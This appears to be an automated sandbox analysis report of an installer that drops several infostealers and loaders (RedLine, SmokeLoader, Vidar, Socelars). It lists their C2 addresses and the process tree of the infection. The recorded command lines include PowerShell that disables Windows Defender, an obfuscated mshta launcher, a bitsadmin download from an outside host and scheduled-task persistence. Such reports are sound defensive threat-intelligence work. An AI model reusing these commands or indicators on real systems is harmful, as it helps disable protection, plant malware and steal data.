Overview

overview

10

Static

static

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows11_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

Resubmissions

02-11-2021 06:54

211102-hpn1zsbhc2 10

02-11-2021 06:42

211102-hgpmjsgggp 10

01-11-2021 21:47

211101-1ncknsfgfm 10

Analysis

  • max time kernel
    1532s
  • max time network
    28635s
  • platform
    windows10_x64
  • resource
    win10-ja-20211014
  • submitted
    01-11-2021 21:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.2MB

  • MD5

    b5b5fe52ed9ca7d47bfb857498fd684c

  • SHA1

    9c17089a630141c9b4e13ef46ab334d46709fdb8

  • SHA256

    6cbb4380d880c6bab221c81122b32e225ebf224942191fb08df5df82f971864b

  • SHA512

    482de7cacf73eb37050e323312b05d3d5d2152048efa5defa4b3d8687f6b3355233d8bf3f04d6107a7214f4b21e4f81f83313ecaf3bdcda98c7d95d60a41e79a

Score
10/10
formbookredlinesmokeloadersocelarsvidar933media0121newjustaspackv2backdoordiscoveryevasioninfostealerpersistencespywarestealersuricatathemidatrojan

Malware Config

Extracted

Family

redline

Botnet

media0121

C2

91.121.67.60:23325

Extracted

Family

redline

Botnet

newjust

C2

135.181.129.119:4805

Extracted

Family

smokeloader

Version

2020

C2

http://brandyjaggers.com/upload/

http://andbal.com/upload/

http://alotofquotes.com/upload/

http://szpnc.cn/upload/

http://uggeboots.com/upload/

http://100klv.com/upload/

http://rapmusic.at/upload/
rc4.i32
rc4.i32

Extracted

Family

vidar

Version

41.6

Botnet

933

C2

https://mas.to/@lilocc

Attributes
  • profile_id

    933

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

    trojanspywarestealerformbook
  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Modifies system executable filetype association 2 TTPs 3 IoCs
    persistence
  • Process spawned unexpected child process 6 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 4 IoCs
  • Registers COM server for autorun 1 TTPs
    persistence
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • suricata: ET MALWARE ClipBanker Variant Activity (POST)

    suricata: ET MALWARE ClipBanker Variant Activity (POST)

    suricata
  • suricata: ET MALWARE FormBook CnC Checkin (GET)

    suricata: ET MALWARE FormBook CnC Checkin (GET)

    suricata
  • suricata: ET MALWARE FormBook CnC Checkin (POST) M2

    suricata: ET MALWARE FormBook CnC Checkin (POST) M2

    suricata
  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata
  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata
  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata
  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

    suricata
  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

    evasion
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Vidar Stealer 2 IoCs
    stealer
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Adds policy Run key to start application 2 TTPs 2 IoCs
    persistence
  • Blocklisted process makes network request 47 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 13 IoCs
    persistence
  • Checks for any installed AV software in registry 1 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 52 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 14 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 22 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 24 IoCs
  • Suspicious use of SetThreadContext 14 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 44 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 14 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Download via BitsAdmin 1 TTPs 2 IoCs
    dropper
  • Kills process with taskkill 10 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 15 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 19 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
    evasionspywaretrojan
  • Script User-Agent 6 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 28 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s BITS
    1⤵
    • Suspicious use of SetThreadContext
    PID:5060
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k SystemNetworkService
      2⤵
      • Drops file in System32 directory
      • Checks processor information in registry
      • Modifies data under HKEY_USERS
      PID:6952
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of SetWindowsHookEx
    PID:2604
    • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3324
      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4860
        • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\setup_install.exe
          "C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\setup_install.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:520
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1724
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2104
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1796
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:396
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon17870faab0.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1896
            • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17870faab0.exe
              Mon17870faab0.exe
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:3884
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c taskkill /f /im chrome.exe
                7⤵
                  PID:7904
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im chrome.exe
                    8⤵
                    • Kills process with taskkill
                    PID:4040
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Mon178e7a516181.exe
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2228
              • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon178e7a516181.exe
                Mon178e7a516181.exe
                6⤵
                • Executes dropped EXE
                • Checks computer location settings
                PID:2888
                • C:\Users\Admin\Pictures\Adobe Films\qxC1nsEi42vuuuXTOfADEOqE.exe
                  "C:\Users\Admin\Pictures\Adobe Films\qxC1nsEi42vuuuXTOfADEOqE.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:5744
                • C:\Users\Admin\Pictures\Adobe Films\MiFnSOOP3jL2bVNTqswI6fwY.exe
                  "C:\Users\Admin\Pictures\Adobe Films\MiFnSOOP3jL2bVNTqswI6fwY.exe"
                  7⤵
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  PID:6492
                • C:\Users\Admin\Pictures\Adobe Films\cyuN1_FPvN4XqHx5jHqquG4S.exe
                  "C:\Users\Admin\Pictures\Adobe Films\cyuN1_FPvN4XqHx5jHqquG4S.exe"
                  7⤵
                    PID:6464
                  • C:\Users\Admin\Pictures\Adobe Films\l9hzlz9ZLt7XuMB8ACGsfFI8.exe
                    "C:\Users\Admin\Pictures\Adobe Films\l9hzlz9ZLt7XuMB8ACGsfFI8.exe"
                    7⤵
                    • Executes dropped EXE
                    • Checks whether UAC is enabled
                    PID:6452
                  • C:\Users\Admin\Pictures\Adobe Films\JFsLr_kYtI5uwpoVO5P9lW6c.exe
                    "C:\Users\Admin\Pictures\Adobe Films\JFsLr_kYtI5uwpoVO5P9lW6c.exe"
                    7⤵
                      PID:6432
                      • C:\Users\Admin\Documents\Eis8rgwPfplaNhGmdMf5sxxc.exe
                        "C:\Users\Admin\Documents\Eis8rgwPfplaNhGmdMf5sxxc.exe"
                        8⤵
                        • Checks computer location settings
                        PID:5776
                        • C:\Users\Admin\Pictures\Adobe Films\OrYBZcRWcgHzIxQuvrmVk6aL.exe
                          "C:\Users\Admin\Pictures\Adobe Films\OrYBZcRWcgHzIxQuvrmVk6aL.exe"
                          9⤵
                            PID:7116
                          • C:\Users\Admin\Pictures\Adobe Films\fyLnniPK_2OpBz3Y2dvMpj4C.exe
                            "C:\Users\Admin\Pictures\Adobe Films\fyLnniPK_2OpBz3Y2dvMpj4C.exe"
                            9⤵
                              PID:6088
                            • C:\Users\Admin\Pictures\Adobe Films\eRnDf2CSvKqVjRsdrizTS0l9.exe
                              "C:\Users\Admin\Pictures\Adobe Films\eRnDf2CSvKqVjRsdrizTS0l9.exe"
                              9⤵
                                PID:2320
                              • C:\Users\Admin\Pictures\Adobe Films\Uu8ktdPLBFcY1iPXMPwESBiH.exe
                                "C:\Users\Admin\Pictures\Adobe Films\Uu8ktdPLBFcY1iPXMPwESBiH.exe"
                                9⤵
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: MapViewOfSection
                                PID:4496
                              • C:\Users\Admin\Pictures\Adobe Films\c9ERkf7LMTbBMG3_wz5MOpln.exe
                                "C:\Users\Admin\Pictures\Adobe Films\c9ERkf7LMTbBMG3_wz5MOpln.exe"
                                9⤵
                                • Checks whether UAC is enabled
                                PID:6868
                                • C:\Windows\SysWOW64\mshta.exe
                                  "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\c9ERkf7LMTbBMG3_wz5MOpln.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\c9ERkf7LMTbBMG3_wz5MOpln.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                  10⤵
                                  • Checks whether UAC is enabled
                                  PID:5136
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\c9ERkf7LMTbBMG3_wz5MOpln.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\c9ERkf7LMTbBMG3_wz5MOpln.exe" ) do taskkill -f -iM "%~NxM"
                                    11⤵
                                      PID:1544
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill -f -iM "c9ERkf7LMTbBMG3_wz5MOpln.exe"
                                        12⤵
                                        • Kills process with taskkill
                                        PID:4936
                                • C:\Users\Admin\Pictures\Adobe Films\qUEUTCQ1XHI9Jzt7MPwLMwfe.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\qUEUTCQ1XHI9Jzt7MPwLMwfe.exe"
                                  9⤵
                                    PID:5712
                                    • C:\Users\Admin\Pictures\Adobe Films\qUEUTCQ1XHI9Jzt7MPwLMwfe.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\qUEUTCQ1XHI9Jzt7MPwLMwfe.exe" -u
                                      10⤵
                                        PID:1324
                                    • C:\Users\Admin\Pictures\Adobe Films\xyNtQmrvs194C2q9XHvjvThR.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\xyNtQmrvs194C2q9XHvjvThR.exe"
                                      9⤵
                                        PID:5628
                                      • C:\Users\Admin\Pictures\Adobe Films\tJWpYBfBdpnOujp6qGKB_GWA.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\tJWpYBfBdpnOujp6qGKB_GWA.exe"
                                        9⤵
                                          PID:1108
                                          • C:\Users\Admin\AppData\Local\Temp\is-E2TS2.tmp\tJWpYBfBdpnOujp6qGKB_GWA.tmp
                                            "C:\Users\Admin\AppData\Local\Temp\is-E2TS2.tmp\tJWpYBfBdpnOujp6qGKB_GWA.tmp" /SL5="$5030C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\tJWpYBfBdpnOujp6qGKB_GWA.exe"
                                            10⤵
                                            • Loads dropped DLL
                                            • Checks whether UAC is enabled
                                            PID:3580
                                            • C:\Users\Admin\AppData\Local\Temp\is-KHKDU.tmp\DYbALA.exe
                                              "C:\Users\Admin\AppData\Local\Temp\is-KHKDU.tmp\DYbALA.exe" /S /UID=2709
                                              11⤵
                                              • Drops file in Drivers directory
                                              • Adds Run key to start application
                                              PID:1248
                                              • C:\Program Files\Windows Security\ODBLXPRXLV\foldershare.exe
                                                "C:\Program Files\Windows Security\ODBLXPRXLV\foldershare.exe" /VERYSILENT
                                                12⤵
                                                • Checks whether UAC is enabled
                                                • Suspicious behavior: GetForegroundWindowSpam
                                                PID:6152
                                              • C:\Users\Admin\AppData\Local\Temp\bf-eb2d8-8db-c43b9-ac517c6b472ed\Vyzharogaewi.exe
                                                "C:\Users\Admin\AppData\Local\Temp\bf-eb2d8-8db-c43b9-ac517c6b472ed\Vyzharogaewi.exe"
                                                12⤵
                                                • Checks computer location settings
                                                PID:2176
                                              • C:\Users\Admin\AppData\Local\Temp\6d-c4a2c-988-06c9e-aceb445de7633\Qaehoxekile.exe
                                                "C:\Users\Admin\AppData\Local\Temp\6d-c4a2c-988-06c9e-aceb445de7633\Qaehoxekile.exe"
                                                12⤵
                                                • Checks whether UAC is enabled
                                                PID:3972
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k5wew0w2.tlj\GcleanerEU.exe /eufive & exit
                                                  13⤵
                                                    PID:6200
                                                    • C:\Users\Admin\AppData\Local\Temp\k5wew0w2.tlj\GcleanerEU.exe
                                                      C:\Users\Admin\AppData\Local\Temp\k5wew0w2.tlj\GcleanerEU.exe /eufive
                                                      14⤵
                                                        PID:4396
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b2fim0sd.mlf\installer.exe /qn CAMPAIGN="654" & exit
                                                      13⤵
                                                        PID:7532
                                                        • C:\Windows\System32\Conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          14⤵
                                                            PID:6584
                                                          • C:\Users\Admin\AppData\Local\Temp\b2fim0sd.mlf\installer.exe
                                                            C:\Users\Admin\AppData\Local\Temp\b2fim0sd.mlf\installer.exe /qn CAMPAIGN="654"
                                                            14⤵
                                                            • Loads dropped DLL
                                                            • Checks whether UAC is enabled
                                                            • Enumerates connected drives
                                                            • Modifies system certificate store
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:7452
                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\b2fim0sd.mlf\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\b2fim0sd.mlf\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634218862 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                              15⤵
                                                                PID:9124
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lnsshwxs.c1l\any.exe & exit
                                                            13⤵
                                                              PID:2848
                                                              • C:\Users\Admin\AppData\Local\Temp\lnsshwxs.c1l\any.exe
                                                                C:\Users\Admin\AppData\Local\Temp\lnsshwxs.c1l\any.exe
                                                                14⤵
                                                                  PID:7232
                                                                  • C:\Users\Admin\AppData\Local\Temp\lnsshwxs.c1l\any.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\lnsshwxs.c1l\any.exe" -u
                                                                    15⤵
                                                                      PID:8720
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qqh4tnh5.xnx\gcleaner.exe /mixfive & exit
                                                                  13⤵
                                                                    PID:5612
                                                                    • C:\Users\Admin\AppData\Local\Temp\qqh4tnh5.xnx\gcleaner.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\qqh4tnh5.xnx\gcleaner.exe /mixfive
                                                                      14⤵
                                                                        PID:1452
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\waxbv2a2.2rk\autosubplayer.exe /S & exit
                                                                      13⤵
                                                                        PID:5700
                                                                        • C:\Users\Admin\AppData\Local\Temp\waxbv2a2.2rk\autosubplayer.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\waxbv2a2.2rk\autosubplayer.exe /S
                                                                          14⤵
                                                                          • Drops file in Program Files directory
                                                                          PID:4888
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn3591.tmp\tempfile.ps1"
                                                                            15⤵
                                                                              PID:8780
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn3591.tmp\tempfile.ps1"
                                                                              15⤵
                                                                                PID:7036
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn3591.tmp\tempfile.ps1"
                                                                                15⤵
                                                                                  PID:764
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn3591.tmp\tempfile.ps1"
                                                                                  15⤵
                                                                                  • Blocklisted process makes network request
                                                                                  PID:8720
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn3591.tmp\tempfile.ps1"
                                                                                  15⤵
                                                                                    PID:1660
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn3591.tmp\tempfile.ps1"
                                                                                    15⤵
                                                                                      PID:4108
                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        16⤵
                                                                                        • Loads dropped DLL
                                                                                        PID:4216
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn3591.tmp\tempfile.ps1"
                                                                                      15⤵
                                                                                      • Checks for any installed AV software in registry
                                                                                      PID:1652
                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        16⤵
                                                                                          PID:6848
                                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                        "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
                                                                                        15⤵
                                                                                        • Download via BitsAdmin
                                                                                        PID:6020
                                                                          • C:\Users\Admin\Pictures\Adobe Films\uSCjYmPU3CH3QGpDJ1ZL8Fwr.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\uSCjYmPU3CH3QGpDJ1ZL8Fwr.exe"
                                                                            9⤵
                                                                            • Loads dropped DLL
                                                                            PID:1016
                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                              C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                              10⤵
                                                                              • Loads dropped DLL
                                                                              • Adds Run key to start application
                                                                              PID:8056
                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"
                                                                                11⤵
                                                                                • Checks whether UAC is enabled
                                                                                PID:8884
                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                  C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1c8,0x1cc,0x1d0,0x58,0x1d4,0x7ff877eadec0,0x7ff877eaded0,0x7ff877eadee0
                                                                                  12⤵
                                                                                    PID:8620
                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                      C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff79e239e70,0x7ff79e239e80,0x7ff79e239e90
                                                                                      13⤵
                                                                                        PID:7524
                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1736,3650273477745804929,15538392481981902781,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8884_81560480" --mojo-platform-channel-handle=1752 /prefetch:8
                                                                                      12⤵
                                                                                        PID:8060
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                8⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:7380
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                8⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:7224
                                                                            • C:\Users\Admin\Pictures\Adobe Films\G_qlYSMI3UpBnqt1rgDYiWfA.exe
                                                                              "C:\Users\Admin\Pictures\Adobe Films\G_qlYSMI3UpBnqt1rgDYiWfA.exe"
                                                                              7⤵
                                                                              • Checks BIOS information in registry
                                                                              • Checks whether UAC is enabled
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:6856
                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                8⤵
                                                                                  PID:1548
                                                                              • C:\Users\Admin\Pictures\Adobe Films\NpNokgBUio4juQ1WHkiRptUG.exe
                                                                                "C:\Users\Admin\Pictures\Adobe Films\NpNokgBUio4juQ1WHkiRptUG.exe"
                                                                                7⤵
                                                                                  PID:6796
                                                                                • C:\Users\Admin\Pictures\Adobe Films\EfYzouvnW3iAXodDye6sK70I.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\EfYzouvnW3iAXodDye6sK70I.exe"
                                                                                  7⤵
                                                                                  • Checks BIOS information in registry
                                                                                  • Checks whether UAC is enabled
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  PID:6684
                                                                                • C:\Users\Admin\Pictures\Adobe Films\KvYEBWEa6dj4FEFN49knLnSU.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\KvYEBWEa6dj4FEFN49knLnSU.exe"
                                                                                  7⤵
                                                                                    PID:6672
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\EoOquW8c4Vfj_NvcnA6gXyuN.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\EoOquW8c4Vfj_NvcnA6gXyuN.exe"
                                                                                    7⤵
                                                                                    • Checks whether UAC is enabled
                                                                                    PID:6664
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\LgGY89P792Li7mvFxyF8GrqY.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\LgGY89P792Li7mvFxyF8GrqY.exe"
                                                                                    7⤵
                                                                                    • Checks whether UAC is enabled
                                                                                    PID:6612
